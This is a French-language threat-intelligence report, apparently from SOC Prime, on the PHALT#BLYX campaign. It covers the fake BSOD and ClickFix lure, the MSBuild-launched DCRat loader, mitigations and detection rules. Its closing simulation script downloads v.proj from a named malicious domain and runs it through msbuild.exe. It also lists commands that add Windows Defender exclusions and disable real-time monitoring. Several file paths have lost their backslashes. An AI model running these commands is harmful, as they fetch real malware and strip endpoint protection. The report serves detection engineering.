SOC Prime Bias: Moyen

06 Jan 2026 16:06 UTC

Analyse de PHALT#BLYX : faux BSOD et outils de construction de confiance dans les chaînes de logiciels malveillants

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
Analyse de PHALT#BLYX : faux BSOD et outils de construction de confiance dans les chaînes de logiciels malveillants
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Le rapport détaille une chaîne d’intrusion multi-étapes affectant le secteur de l’hôtellerie qui combine une fausse page d’accueil Booking.com, une animation trompeuse de type écran bleu, et un message à la ClickFix pour persuader les utilisateurs d’exécuter un dropper PowerShell. Ce dropper récupère un fichier projet MSBuild, qui exécute un chargeur DCRat sur mesure. Le chargeur altère Windows Defender, établit une persistance en utilisant un raccourci de démarrage .url, et injecte sa charge utile dans des processus légitimes. En s’appuyant sur des utilitaires « living-off-the-land » comme PowerShell et MSBuild.exe, les opérateurs réduisent les traces évidentes de logiciels malveillants. Des artefacts en langue russe dans la chaîne sont également notés comme un indice d’attribution.

Enquête

Les chercheurs de Securonix ont cartographié le flux depuis les emails de phishing offrant des liens de « résiliation de réservation » vers un domaine malveillant, puis vers une ligne de commande PowerShell qui localise msbuild.exe, télécharge un fichier v.proj, et l’exécute. Le projet v.proj effectue plusieurs actions: il ajoute des exclusions Windows Defender, récupère staxs.exe (une variante de DCRat), crée un raccourci de démarrage .url pour la persistance, et se connecte à l’infrastructure de commande et contrôle sur le port 3535. Le chargeur compresse ensuite et injecte l’étape finale dans aspnet_compiler.exe, utilisant un processus d’hollowing pour se fondre dans une activité légitime.

Atténuation

Réduisez l’exposition en formant les utilisateurs à reconnaître les messages de type ClickFix et les ingénieries sociales « exécutez cette commande pour résoudre ». Surveillez et restreignez l’exécution de MSBuild.exe, notamment lorsqu’il est invoqué depuis des chemins inhabituels ou des flux de travail pilotés par l’utilisateur, et activez la journalisation des blocs de script PowerShell pour une meilleure visibilité. Ajoutez des détections pour la création de raccourcis .url dans le dossier de démarrage et pour les modifications des exclusions de Windows Defender. Au niveau du réseau, bloquez le trafic sortant vers les domaines malveillants identifiés et interdisez explicitement ou alertez sur les sorties TCP/3535 suspectes là où elles ne sont pas requises.

Réponse

Si une activité est détectée, isolez l’hôte et conservez les artefacts clés, y compris v.proj, staxs.exe, et tout fichier de démarrage .url. Supprimez les exclusions Defender non autorisées, terminez les processus malveillants ou injectés, et bloquez les domaines/IPs associés de commande et contrôle, particulièrement toute communication sur le port 3535. Réinitialisez les identifiants potentiellement exposés, effectuez une analyse complète des logiciels malveillants, et examinez l’environnement pour détecter des exécutions similaires pilotées par MSBuild et des modèles de commandes PowerShell. Enfin, déployez des détections informées par le renseignement sur les menaces qui se concentrent sur les abus de MSBuild, le comportement ClickFix, et la persistance via les raccourcis de démarrage pour prévenir la récurrence.

Flux d’attaque

Détections

Téléchargement ou Téléversement via Powershell (via cmdline)

Équipe de SOC Prime
06 janvier 2026

Modifications Suspectes des Préférences de Windows Defender (via powershell)

Équipe de SOC Prime
06 janvier 2026

Points de Persistance Possibles [ASEPs – Hive Software/NTUSER] (via registry_event)

Équipe de SOC Prime
06 janvier 2026

Binaire/Script Suspect dans l’Emplacement d’Autostart (via file_event)

Équipe de SOC Prime
06 janvier 2026

IOC (HashSha512) à détecter : Analyse de PHALT#BLYX : comment les faux BSOD et les outils de construction fiables sont utilisés pour construire une infection malveillante

Règles d’IA SOC Prime
06 janvier 2026

IOC (SourceIP) à détecter : Analyse de PHALT#BLYX : comment les faux BSOD et les outils de construction fiables sont utilisés pour construire une infection malveillante

Règles d’IA SOC Prime
06 janvier 2026

IOC (HashSha256) à détecter : Analyse de PHALT#BLYX : comment les faux BSOD et les outils de construction fiables sont utilisés pour construire une infection malveillante

Règles d’IA SOC Prime
06 janvier 2026

IOC (DestinationIP) à détecter : Analyse de PHALT#BLYX : comment les faux BSOD et les outils de construction fiables sont utilisés pour construire une infection malveillante

Règles d’IA SOC Prime
06 janvier 2026

Exécution de Charge Utile Malveillante PHALT#BLYX via MSBuild et Process Hollowing [Création de Processus Windows]

Règles d’IA SOC Prime
06 janvier 2026

Campagne de Logiciel Malveillant PHALT#BLYX Utilisant PowerShell et MSBuild pour l’Infection [PowerShell Windows]

Règles d’IA SOC Prime
06 janvier 2026

Exécution de Simulation

Condition Préalable : la Vérification de l’Instrumentation et du Baseline doit avoir réussi.

Raison : Cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit reflètent directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection.

  • Narratif & Commandes de l’Attaque :
    L’acteur de la menace ouvre une session PowerShell sur un point d’extrémité compromis. Il localise d’abord le msbuild.exe système, puis télécharge un projet MSBuild malveillant (v.proj) dans C:ProgramData. L’attaquant invoque immédiatement msbuild.exe pour exécuter la charge utile, qui dépose une deuxième étape. Enfin, il altère Windows Defender en ajoutant des exclusions et en désactivant la surveillance en temps réel pour garantir la persistance.

  • Script de Test de Régression :

    # Script de simulation PHALT#BLYX – reproduit l'activité déclenchant la détection
    # --------------------------------------------------------------
    # 1. Localiser msbuild.exe
    $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName
    
    # 2. Téléchargez le projet MSBuild malveillant vers ProgramData
    $projUrl = "https://2fa-bns.com/v.proj"
    $dest    = "$env:ProgramDatav.proj"
    Invoke-WebRequest -Uri $projUrl -OutFile $dest
    
    # 3. Exécuter le projet avec msbuild.exe
    & $msb $dest
    
    # 4. Modifier les paramètres de Windows Defender (n'importe lequel des éléments suivants satisfera à la règle)
    #    Décommentez les lignes souhaitées pour simuler les actions de l'attaquant.
    
    # Ajouter un chemin d'exclusion
    # Add-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Ajouter une exclusion pour les fichiers .exe
    # Add-MpPreference -ExclusionExtension ".exe"
    
    # Ajouter une exclusion pour les fichiers .ps1
    # Add-MpPreference -ExclusionExtension ".ps1"
    
    # Désactiver la Surveillance en temps réel
    # Set-MpPreference -DisableRealtimeMonitoring $true
  • Commandes de Nettoyage :

    # Supprimez le fichier projet déposé
    Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue
    
    # Restaurez la Surveillance en temps réel de Windows Defender (si elle a été désactivée)
    Set-MpPreference -DisableRealtimeMonitoring $false
    
    # Supprimez toutes les exclusions ajoutées (exemple pour l'exclusion de chemin)
    Remove-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Supprimez éventuellement tous les fichiers restants créés par la charge utile
    # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue